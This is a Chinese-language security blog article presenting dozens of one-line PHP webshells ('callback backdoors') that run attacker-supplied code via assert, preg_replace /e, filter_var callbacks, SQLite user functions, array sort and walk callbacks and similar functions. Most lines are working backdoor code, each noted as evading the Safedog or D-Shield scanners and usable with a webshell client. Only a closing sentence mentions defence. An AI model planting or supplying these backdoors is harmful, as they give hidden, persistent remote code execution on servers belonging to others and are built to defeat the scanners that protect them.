PHP回調後門可繞過安全狗

最近很多人分享一些過狗過盾的一句話，但無非是用各種方法去構造一些動態函數，比如$_GET['func']($_REQUEST['pass'])之類的方法。萬變不離其宗，但這種方法，雖然狗盾可能看不出來，但人肉眼其實很容易發現這類後門的。

    那麼，我就分享一下，一些不需要動態函數、不用eval、不含敏感函數、免殺免攔截的一句話。

0x00 前言

    有很多朋友喜歡收藏一些tips，包括我也收藏了好多tips，有時候在滲透和漏洞挖掘過程中很有用處。

    一句話的tips相信很多朋友也收集過好多，過狗一句話之類的。14年11月好像在微博上也火過一個一句話，當時也記印象筆記裡了：

    

    有同學收集tips，就有同學創造tips。那麼我們怎麼來創造一些過狗、過D盾、無動態函數、無危險函數（無特徵）的一句話（後門）？

    根據上面這個pdo的一句話，我就可以得到一個很具有普適性的結論：php中包含回呼函數參數的函數，具有做後門的潛質。

    我就自己給這類webshell起了個名字：回調後門。

0x01 回調後門的老祖宗

    php中call_user_func是執行回呼函數的標準方法，這也是一個比較老的後門了：

call_user_func('assert', $_REQUEST['pass']);

    assert直接作為回呼函數，然後$_REQUEST['pass']作為assert的參數調用。

    這個後門，狗和盾都可以查到（但是狗不會攔截）：

    

    可php的函數庫是很豐富的，只要簡單改下函數安全狗就不殺了：

call_user_func_array('assert', array($_REQUEST['pass']));

    call_user_func_array函數，和call_user_func類似，只是第二個參數可以傳入參數列表組成的數組。如圖：

    

    可見，雖然狗不殺了，D盾還是聰明地識別了出來。

    看來，這種傳統的回調後門，已經被一些安全廠商盯上了，存在被查殺的風險。

0x02 數組操作造成的單參數回調後門

    進一步思考，在平時的php開發中，遇到過的帶有回調參數的函數絕不止上面說的兩個。這些含有回調（callable類型）參數的函數，其實都有做“回調後門”的潛力。

    我最早想到個最“簡單好用的”：

$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e));

    array_filter函數是將數組中所有元素遍曆並用指定函數處理過濾用的，如此調用（此後的測試環境都是開著狗的，可見都可以執行）：

    

    這個後門，狗查不出來，但D盾還是有感應，報了個等級3（顯然比之前的等級4要低了）：

    

    類似array_filter，array_map也有同樣功效：

$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_map(base64_decode($e), $arr);

    依舊被D盾查殺。

    果然，簡單的數組回調後門，還是很容易被發現與查殺的。

0x03 php5.4.8+中的assert

    php 5.4.8+後的版本，assert函數由一個參數，增加了一個選擇性參數descrition：

    

    這就增加（改變）了一個很好的“執行代碼”的方法assert，這個函數可以有一個參數，也可以有兩個參數。那麼以前回調後門中有兩個參數的回呼函數，現在就可以使用了。

    比如如下回調後門：

$e = $_REQUEST['e'];$arr = array('test', $_REQUEST['pass']);uasort($arr, base64_decode($e));

    這個後門在php5.3時會報錯，提示assert只能有一個參數：

    

    php版本改作5.4後就可以執行了：

    

    這個後門，狗和盾是都查不出來的：

    

    同樣的道理，這個也是功能類似：

$e = $_REQUEST['e'];$arr = array('test' => 1, $_REQUEST['pass'] => 2);uksort($arr, $e);

    再給出這兩個函數，物件導向的方法：

// way 0$arr = new ArrayObject(array('test', $_REQUEST['pass']));$arr->uasort('assert');// way 1$arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));$arr->uksort('assert');

    再來兩個類似的回調後門：

$e = $_REQUEST['e'];$arr = array(1);array_reduce($arr, $e, $_POST['pass']);

$e = $_REQUEST['e'];$arr = array($_POST['pass']);$arr2 = array(1);array_udiff($arr, $arr2, $e);

    以上幾個都是可以直接菜刀串連的一句話，但目標PHP版本在5.4.8及以上才可用。

    我把上面幾個類型歸為：二參數回呼函數（也就是回呼函數的格式是需要兩個參數的）

0x04 三參數回呼函數

    有些函數需要的回呼函數類型比較苛刻，回調格式需要三個參數。比如array_walk。

    array_walk的第二個參數是callable類型，正常情況下它是格式是兩個參數的，但在0x03中說了，兩個參數的回調後門需要使用php5.4.8後的assert，在5.3就不好用了。但這個回調其實也可以接受三個參數，那就好辦了：

    

    php中，可以執行代碼的函數：

1. 一個參數：assert

2. 兩個參數：assert （php5.4.8+）

3. 三個參數：preg_replace /e模式

    三個參數可以用preg_replace。所以我這裡構造了一個array_walk + preg_replace的回調後門：

$e = $_REQUEST['e'];$arr = array($_POST['pass'] => '|.*|e',);array_walk($arr, $e, '');

    如圖，這個後門可以在5.3下使用：

    

    但強大的D盾還是有警覺（雖然只是等級2）：

    

    不過呵呵，PHP擁有那麼多靈活的函數，稍微改個函數（array_walk_recursive）D盾就查不出來了：

$e = $_REQUEST['e'];$arr = array($_POST['pass'] => '|.*|e',);array_walk_recursive($arr, $e, '');

    不截圖了。

    看了以上幾個回調後門，發現preg_replace確實好用。但顯然很多WAF和頓頓狗狗的早就盯上這個函數了。其實php裡不止這個函數可以執行eval的功能，還有幾個類似的：

mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');

    另一個：

echo preg_filter('|.*|e', $_REQUEST['pass'], '');

    這兩個一句話都是不殺的：

    

    

    好用的一句話，且用且珍惜呀。

0x05 無回顯回調後門

    回調後門裡，有個特殊的例子：ob_start。

    ob_start可以傳入一個參數，也就是當緩衝流輸出時調用的函數。但由於某些特殊原因（可能與輸出資料流有關），即使有執行結果也不在流裡，最後也輸出不了，所以這樣的一句話沒法用菜刀串連：

ob_start('assert');echo $_REQUEST['pass'];ob_end_flush();

    但如果執行一個url請求，用神器cloudeye還是能夠觀測到結果的：

    

    

    即使沒輸出，實際代碼是執行了的。也算作回調後門的一種。

0x06 單參數後門終極奧義

    preg_replace、三參數後門雖然好用，但/e模式php5.5以後就廢棄了，不知道哪天就會給刪了。所以我覺得還是單參數後門，在各個版本都比較好駕馭。

    這裡給出幾個好用不殺的回調後門

$e = $_REQUEST['e'];register_shutdown_function($e, $_REQUEST['pass']);

    這個是php全版本支援的，且不報不殺穩定執行：

    

    

    再來一個：

$e = $_REQUEST['e'];declare(ticks=1);register_tick_function ($e, $_REQUEST['pass']);

    再來兩個：

filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));

    這兩個是filter_var的利用，php裡用這個函數來過濾數組，只要指定過濾方法為回調（FILTER_CALLBACK），且option為assert即可。

    這幾個單參數回調後門非常隱蔽，基本沒特徵，用起來很6.

0x07 資料庫操作與第三方庫中的回調後門

    回到最早微博上發出來的那個sqlite回調後門，其實sqlite可以構造的回調後門不止上述一個。

    我們可以註冊一個sqlite函數，使之與assert功能相同。當執行這個sql語句的時候，就等於執行了assert。所以這個後門我這樣構造：

$e = $_REQUEST['e'];$db = new PDO('sqlite:sqlite.db3');$db->sqliteCreateFunction('myfunc', $e, 1);$sth = $db->prepare("SELECT myfunc(:exec)");$sth->execute(array(':exec' => $_REQUEST['pass']));

    執行之：

    

    上面的sqlite方法是依靠PDO執行的，我們也可以直接調用sqlite3的方法構造回調後門：

$e = $_REQUEST['e'];$db = new SQLite3('sqlite.db3');$db->createFunction('myfunc', $e);$stmt = $db->prepare("SELECT myfunc(?)");$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);$stmt->execute();

    前提是php5.3以上。如果是php5.3以下的，使用sqlite_*函數，自己研究我不列出了。

    這兩個回調後門，都是依靠php擴充庫（pdo和sqlite3）來實現的。其實如果目標環境中有特定擴充庫的情況下，也可以來構造回調後門。

    比如php_yaml：

$str = urlencode($_REQUEST['pass']);$yaml = <<<EODgreeting: !{$str} "|.+|e"EOD;$parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));

    還有php_memcached：

$mem = new Memcache();$re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));$mem->connect($_REQUEST['pass'], 11211, 0);

    自行研究吧。

0x08 其他參數型回調後門

    上面說了，回呼函數格式為1、2、3參數的時候，可以利用assert、assert、preg_replace來執行代碼。但如果回呼函數的格式是其他參數數目，或者參數類型不是簡單字串，怎麼辦？

    舉個例子，php5.5以後建議用preg_replace_callback代替preg_replace的/e模式來處理正則執行替換，那麼其實preg_replace_callback也是可以構造回調後門的。

    preg_replace_callback的第二個參數是回呼函數，但這個回呼函數被傳入的參數是一個數組，如果直接將這個指定為assert，就會執行不了，因為assert接受的參數是字串。

    所以我們需要去“構造”一個滿足條件的回呼函數。

    怎麼構造？使用create_function：

preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);

    “創造”一個函數，它接受一個數組，並將數組的第一個元素$arr[0]傳入assert。

    這也是一個不殺不報穩定執行的回調後門，但因為有create_function這個敏感函數，所以看起來總是不太爽。不過也是沒辦法的事。

    類似的，這個也同樣：

mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);

    再來一個利用CallbackFilterIterator方法的回調後門：

$iterator = new CallbackFilterIterator(new ArrayIterator(array($_REQUEST['pass'],)), create_function('$a', 'assert($a);'));foreach ($iterator as $item) {    echo $item;}

    這裡也是借用了create_function來建立回呼函數。但有些同學就問了，這裡建立的回呼函數只有一個參數呀？實際上這裡如果傳入assert，是會報錯的，具體原因自己分析。

0x09 後記

    這一篇文章，就像一枚核武器，爆出了太多無特徵的一句話後門。我知道相關廠商在看了文章以後，會有一些小動作。不過我既然敢寫出來，那麼我就敢保證這些方法是多麼難以防禦。

    實際上，回調後門是靈活且無窮無盡的後門，只要php還在發展，那麼就有很多很多擁有回呼函數的後門被創造。想要防禦這樣的後門，光光去指哪防哪肯定是不夠的。

    簡單想一下，只有我們去控制住assert、preg_replace這類函數，才有可能防住這種漏洞